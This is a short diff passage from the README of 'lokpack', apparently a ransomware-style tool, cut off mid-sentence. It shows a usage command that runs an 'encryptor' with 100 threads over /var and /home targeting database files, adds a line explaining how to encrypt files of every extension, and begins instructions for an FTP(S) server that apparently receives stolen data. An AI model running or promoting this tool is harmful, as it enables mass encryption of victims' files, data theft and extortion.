ngn13/lokpack/README.md

 ```bash
 ./encryptor --threads=100 --paths=/var,/home --exts=sql,db --no-ftp
 ```
+If you want to encrypt all files with all extensions, set `--exts` to `ALL`.

 ### Setting up FTP(S)
 For an actual FTP(S) setup you should install a FTP daemon such as `vsftpd` or `bftpd`.
 But for testing you can